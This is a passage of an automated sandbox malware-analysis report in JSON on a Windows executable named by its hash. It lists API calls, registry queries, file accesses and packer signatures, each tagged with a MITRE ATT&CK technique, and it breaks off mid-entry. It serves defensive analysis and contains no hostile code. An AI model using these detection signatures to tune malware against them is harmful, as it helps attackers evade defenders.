\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter ScrollBar_MouseMove (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter ScrollBar_Menu (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter HandleScrollCmd (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter DetachScrollBars (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter AttachScrollBars (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CCSetScrollInfo (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CCGetScrollInfo (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CCEnableScrollBar (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter QuerySystemGestureStatus (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter GetTextExtentExPointWPri (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter MonitorFromWindow (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter NotifyWinEvent (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" searching for class \"MS_WINHELP\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has an executable section named \"CODE\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76AF0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has an writable section named \"DATA\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has an writable section named \"BSS\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has an writable section named \".idata\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" was detected as \"Turbo Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5\" was detected as \"BobSoft Mini Delphi -> BoB / BobSoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\version.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\winmm.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.ENU.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.EN.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5.ENU.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5.EN.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\DWMAPI.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" reads file \"c:\\windows\\fonts\\staticcache.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\version.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\version.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe.Local\\\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\\comctl32.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\winspool.drv\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\winspool.drv\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\winmm.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\winmm.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.ENU\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.ENU.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.EN\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.EN.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\dwmapi.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\dwmapi.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe.Local\\\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\winspool.drv\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.ENU\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.EN\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\system32\\uxtheme.dll.Config\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5.EXE.LOCAL\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5.ENU\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5.EN\"\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"395B770294B42CC9643BDA8493591713F80E56CB3E13E438EA2F62295E8585C5\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\LANGUAGEPACK\\DATASTORE_V1.0\"; Key: \"DISABLE\"; Value: \"\")\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\LANGUAGEPACK\\DATASTORE_V1.0\"; Key: \"DATAFILEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"FindResourceA\" with parameter \"21767412\" - (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"FindResourceA\" with parameter \"21797540\" - (UID: 00000000-00005520)\n \"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"FindResourceA\" with parameter \"21770844\" - (UID: 00000000-00005520)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"395b770294b42cc9643bda8493591713f80e56cb3e13e438ea2f62295e8585c5.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4713344'}\" (UID: 00000000-00005520)\n 